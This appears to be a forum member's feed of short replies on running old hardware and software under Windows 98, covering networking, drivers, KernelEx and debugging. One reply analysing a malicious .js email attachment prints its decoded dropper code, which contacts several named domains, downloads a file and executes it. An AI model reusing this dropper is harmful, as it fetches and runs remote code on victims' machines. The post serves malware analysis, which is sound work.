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Is my MOCA adapter to blame for unstable Remote Desktop?
jumper replied to PlayWithFire's topic in Networks and the Internet
I believe so. One of the machines may need to act as a server (plugged into the WAN port), however. >the same hub, which is connected to a MOCA adapter If you mean the MoCA adapter is plugged into the hub, try unplugging the MoCA adapter from the hub. This might be enough to fix the performance of your existing configuration. -
Is my MOCA adapter to blame for unstable Remote Desktop?
jumper replied to PlayWithFire's topic in Networks and the Internet
> My personal PC and work laptop are connected to the same hub Wired or wireless? If wired, a cross-over cable directly between the two should be fastest. If wireless, disconnect the hub from the rest of the network (yes, a switch or router might be needed) and all other devices from the hub. In short, create the fastest local area network you can that just includes these two machines. MoCA is tuned for multimedia, so stay off that network when you're looking for performance from non-multimedia applications. -
Was all this on a Win7x64 machine, or did you plug them into an x32, Win10, Linux, or OSX machine?
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Windows 9x SSL Protocol WinSSLWrap 1.17 (Rev 08)
jumper replied to PROBLEMCHYLD's topic in Windows 9x Member Projects
What about those of us without SSE at all?- 44 replies
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I use Autoruns v8.31 on Win98SE. MDGx recommends:
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>D00748-001-002.exe which is Widcomm 5.1.0.2800 Did you mean 5.0.1.2800? Try the Anycom drivers which are newer. Also, when installers don't work (for whatever reason), it is sometimes possible to extract and transplant individual files. You probably want to avoid Device Firmaware Upgrades (dfu files) from other manufacturers, however. Another great discussion to read: How to Install Widcomm Drivers
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30600 "C:\PROGRA~1\MESSEN~1" "PROGRA~1" works for "Program Files" because the folder already exists so do the same with "MESSEN~1" / "Messenger": 1) Rename the folder "Messenger" 2) Check its properties to confirm the DOS filename is "MESSEN~1" 3) Use 30600 Win98se is not WinME; sometimes it needs a little bit of manual help to work around DOS limitations like 8.3 filenames. p.s. filenames in Wininit.ini are known to get truncated to 8.3
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According to http://forum.gsmhosting.com/vbb/f237/widcomm-bluetooth-software-5-1-0-2800-keygen-363992/ on Jan-08-2007, the last version for Win9x was 5.1.0.2700. Wayback has the .1700 and .2100 Anycom drivers. http://www.wireless-driver.com/dell-wireless-355-bluetooth-module-windows-driver-software/ claims to have:
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Going back to your original post: it sounds like you had a power surge that killed the machine (and maybe the monitors, too).
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Realtek AC'97 drivers
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Malware .js email attachments - execution on 9x/me ?
jumper replied to Nomen's topic in Windows 9x/ME
I made these small changes and it runs in IE5. <script> ... document.writeln(tz) //this[nbny243()](tz); </script> The numerous functions each return a short string and are declared in jumbled order. The loop calls all functions in the proper order and concatenates the strings into the real script. The call to nbny243 evaluates the full string, causing it execute. The full string is: function dl(fr) { var b = "dickinsonwrestlingclub.com www.fibrasinteticafm.com laterrazzafiorita.it".split(" "); for (var i=0; i 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open("GET","http://"+b+"/document.php?rnd="+fr+"&id="+str, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(8391); dl(5142); dl(2053); -
V5R14 requires: Looks like you'll need to check ebay for V4 or earlier.Update: According to http://www.firstratemold.com/about-us/c19-news/what-is-catia/, Catia never supported non-NT Windows. It also appears to be the type of software that "If you need to ask, you can't afford it." In other words, if you can't afford to buy a dedicated system to run it on, you won't be able to afford the software itself.
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There's not much to say except the obvious: Outlook is leaking User resources and needs to be restarted more often. I'll add resource monitoring to a future version of the KernelEx debugger.
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Microsoft XBOX 360 PC-gamepad in Windows 98SE, Not Working!
jumper replied to marcooleo's topic in Windows 9x/ME
Is your game port on the mainboard or a soundcard? If the former, it needs to be enabled in the BIOS setup. -
KernelEx 2022 (Kex22) Test Versions (4.22.26.2)
jumper replied to jumper's topic in Windows 9x Member Projects
Does CamStudio v2.7 (or earlier) work correctly under KernelEx 4.5.2 or earlier versions of KernelEx 4.5.2015? -
Dolphin (and pcsx2 as well) doesn't work on windows 98
jumper replied to junior600's topic in Windows 9x/ME
Thanks. Turns out there isn't actually an error at all! They are calling RaiseException with value 406d1388H to talk to the MS VisualStudio debugger (which they shouldn't be doing in a release version.) The exception is "continuable" meaning the debugger can process it or ignore it and then the app should continue. The workaround is to run them in a debugger. Finesse might do. Edit: -
I just reviewed topic/172888-blurry-screen and it is a must read for the current issue.
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Dolphin (and pcsx2 as well) doesn't work on windows 98
jumper replied to junior600's topic in Windows 9x/ME
For dolphin-3.0-win32.exe ImportPatcher41 reports: But 007b41a3 isn't a valid address in Dolphin 3.0, and now I see this error text doesn't match the original screencap, so you gave the error text for a different version! wrong error text! (However, the opcode bytes do match so maybe I can get a headstart on the debugging while I await the correct error text....) >(the same error message shows with pcsx2) No it doesn'tThe error code might be the same, but the message details will differ somewhat ....Please provide that error text and a link to that app as well. Edit: Removed some of the late-night gruff. -
Both video cards are GeForce, but different chipsets.... Contact Asus and MSI concerning DVI-D compatibility with the two different GeForce chipsets. The GeForce4 might not fully support all features of the latest version of DVI-D. If this is a known issue, their engineers (of either company) might have a (unsupported) software utility for you to try. As for a workaround, once the monitor has been booted with Win7 and is working correctly, don't power it off! Let it hibernate when the PC's are off.
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Dolphin (and pcsx2 as well) doesn't work on windows 98
jumper replied to junior600's topic in Windows 9x/ME
And what is the full text (not screencap) of that error message? -
DeviceIOControl should do it, but needs a handle from CreateFile and the PlatformSDK (Feb.2003) says: "Windows Me/98/95: You cannot open a directory, physical disk, or volume using CreateFile." This is likely the reason SetupDiEnumDevice* is failing on 9x. But we can send control codes directly to VxD's such as VMM32.vxd and IFSMGR.vxd: Calling DeviceIOControl on Windows Me/98/95 edit: Waybacked the link
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From MSDevStudio97 (VC5) help: and
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>mounting a virtual partition. Please tell us more about this.
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What video card is in the Win7 system? You might need a similar one in SE.